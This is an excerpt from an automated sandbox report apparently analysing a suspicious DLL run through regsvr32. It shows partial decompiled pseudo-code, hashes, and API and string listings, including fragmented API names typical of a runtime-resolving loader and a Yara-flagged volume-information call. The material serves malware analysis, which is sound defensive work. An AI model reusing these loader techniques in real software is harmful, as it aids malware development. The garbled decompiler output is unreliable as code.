                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7291B13261469885F7A2CF6598403ED3BA0F749BC8F14C11AFE4A67A95DF74C68AC710
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            C-Code - Quality: 29%
                                                                                                                                                                                                            			E0000000118000DC50(signed int __edx, void* __edi, void* __rax, signed long long __rbx, intOrPtr* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed int _a5176, void* _a5192) {
                                                                                                                                                                                                            				intOrPtr _v0;
                                                                                                                                                                                                            				signed long long _v8;
                                                                                                                                                                                                            				signed int _t41;
                                                                                                                                                                                                            				signed long long _t62;
                                                                                                                                                                                                            				short* _t67;
                                                                                                                                                                                                            				signed int* _t68;
                                                                                                                                                                                                            				void* _t91;
                                                                                                                                                                                                            				void* _t97;
                                                                                                                                                                                                            				void* _t99;
                                                                                                                                                                                                            				void* _t102;
                                                                                                                                                                                                            				void* _t103;
                                                                                                                                                                                                            
                                                                                                                                                                                                            				_a8 = __rbx;
                                                                                                                                                                                                            				_a24 = __rbp;
                                                                                                                                                                                                            				E0000000118000F880(0x1470, __rax, _t97, _t99);
                                                                                                                                                                                                            				_t62 =  *0x80021010; // 0xc23e8d4af72c
                                                                                                                                                                                                            				_a5176 = _t62 ^ _t91 - __rax;
                                                                                                                                                                                                            				r14d = r9d;
                                                                                                                                                                                                            				r10d = r10d & 0x0000003f;
                                                                                                                                                                                                            				_t103 = _t102 + __r8;
                                                                                                                                                                                                            				 *((long long*)(__rcx)) =  *((intOrPtr*)(0x800227f0 + (__edx >> 6) * 8));
                                                                                                                                                                                                            				 *((intOrPtr*)(__rcx + 8)) = 0;
                                                                                                                                                                                                            				if (__r8 - _t103 >= 0) goto 0x8000dd91;
                                                                                                                                                                                                            				_t67 =  &_a40;
                                                                                                                                                                                                            				if (__r8 - _t103 >= 0) goto 0x8000dcfa;
                                                                                                                                                                                                            				_t41 =  *__r8 & 0x0000ffff;
                                                                                                                                                                                                            				if (_t41 != 0xa) goto 0x8000dce6;
                                                                                                                                                                                                            				 *_t67 = 0xd;
                                                                                                                                                                                                            				_t68 = _t67 + 2;
                                                                                                                                                                                                            				 *_t68 = _t41;
                                                                                                                                                                                                            				if ( &(_t68[0]) -  &_a1744 < 0) goto 0x8000dcc8;
                                                                                                                                                                                                            				_a16 = _a16 & 0x00000000;
                                                                                                                                                                                                            				_a8 = _a8 & 0x00000000;
                                                                                                                                                                                                            				_v0 = 0xd55;
                                                                                                                                                                                                            				_v8 =  &_a1752;
                                                                                                                                                                                                            				r9d = 0;
                                                                                                                                                                                                            				E0000000118000A154();
                                                                                                                                                                                                            				if (0 == 0) goto 0x8000dd89;
                                                                                                                                                                                                            				if (0 == 0) goto 0x8000dd79;
                                                                                                                                                                                                            				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                            				r8d = 0;
                                                                                                                                                                                                            				r8d = r8d;
                                                                                                                                                                                                            				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000dd89;
                                                                                                                                                                                                            				if (0 + _a24 < 0) goto 0x8000dd46;
                                                                                                                                                                                                            				 *((intOrPtr*)(__rcx + 4)) = __edi - r15d;
                                                                                                                                                                                                            				goto 0x8000dcbd;
                                                                                                                                                                                                            				 *((intOrPtr*)(__rcx)) = GetLastError();
                                                                                                                                                                                                            				return E000000011800010B0(_t39, 0, _a5176 ^ _t91 - __rax);
                                                                                                                                                                                                            			}















                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                                                                            • String ID: U
                                                                                                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                                                                                                            • Opcode ID: bcf7ee1ea3ec2a9cc3b1d78a5d2c7ec9e62fd3dc134ebc80f67064554232c18b
                                                                                                                                                                                                            • Instruction ID: c34ad0e7ff2d66e96fda8e7ac49a4eca9b2c2d7f4ff30b46897494357c1f583c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: bcf7ee1ea3ec2a9cc3b1d78a5d2c7ec9e62fd3dc134ebc80f67064554232c18b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E441A472614A8886EBA2CF25E4447EA7761F79C7D4F408022EE4E87758DF7CC645C750
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                                                                            • Opcode ID: 43dc2e1a8b3bf6a6ca3c7988f27fb1d1dbaf565cf4dd9104b15b21490a7c12b7
                                                                                                                                                                                                            • Instruction ID: 9822ff17b0ce5fbc637df8732c669b6e85e1acb8a855211156653d926a5084e0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 43dc2e1a8b3bf6a6ca3c7988f27fb1d1dbaf565cf4dd9104b15b21490a7c12b7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D114C72614B4482EBA28F25F440399B7A0F788BD4F188220EE8C0B769DF38CA55CB04
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ClassCursorLoadRegister
                                                                                                                                                                                                            • String ID: P
                                                                                                                                                                                                            • API String ID: 1693014935-3110715001
                                                                                                                                                                                                            • Opcode ID: 24b0b9f3c1b09ae8b28d8b77cab2a0cc8b6b471604828e0fcca638cf8f3030e2
                                                                                                                                                                                                            • Instruction ID: c953b54a92ac3cc4e92e902e3110dd604cc2aeb839ef1ea803bcd24b7a7bdda6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 24b0b9f3c1b09ae8b28d8b77cab2a0cc8b6b471604828e0fcca638cf8f3030e2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8501B232519F8486E7A18F00F89834BB7B4F388788F604119E6CD42B68DFBDC258CB40
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                            Execution Coverage:15.9%
                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                                            Total number of Nodes:38
                                                                                                                                                                                                            Total number of Limit Nodes:4

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.884530382.0000000000C20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_c20000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                                                                                                                            • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                                                                                                                                            • API String ID: 394283112-3605381585
                                                                                                                                                                                                            • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                                                                                                                            • Instruction ID: 67b06c5aa51e8499af8920f3f8b88880698457fe6efb6411bdf370eca22be596
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B521630618B588BC719DF18E8857BAB7F1FB54304F24462EE89BC7652DB34E542CB86
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 305 25240a0-2524136 call 2539f38 308 25241ca-2524202 GetVolumeInformationW 305->308 309 252413c-25241c4 call 252a940 305->309 309->308
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetVolumeInformationW.KERNELBASE ref: 025241EB
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.885272914.0000000002521000.00000020.00001000.00020000.00000000.sdmp, Offset: 02521000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_2521000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InformationVolume
                                                                                                                                                                                                            • String ID: Ql$v[
                                                                                                                                                                                                            • API String ID: 2039140958-138011117
                                                                                                                                                                                                            • Opcode ID: 3a0f33469602c5b2414fed7c4f525ce4c0e953e4a15951e85aa6350d2a5935a1
                                                                                                                                                                                                            • Instruction ID: 28c14543c417f0ff08b8a004723bce4ec41cf5f3a8781065285a4fa2fd7a7d87
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a0f33469602c5b2414fed7c4f525ce4c0e953e4a15951e85aa6350d2a5935a1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A313A7051CB848BD7B8DF18D48579AB7E1FB88315F60895DE88CC7295CF789888CB46
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%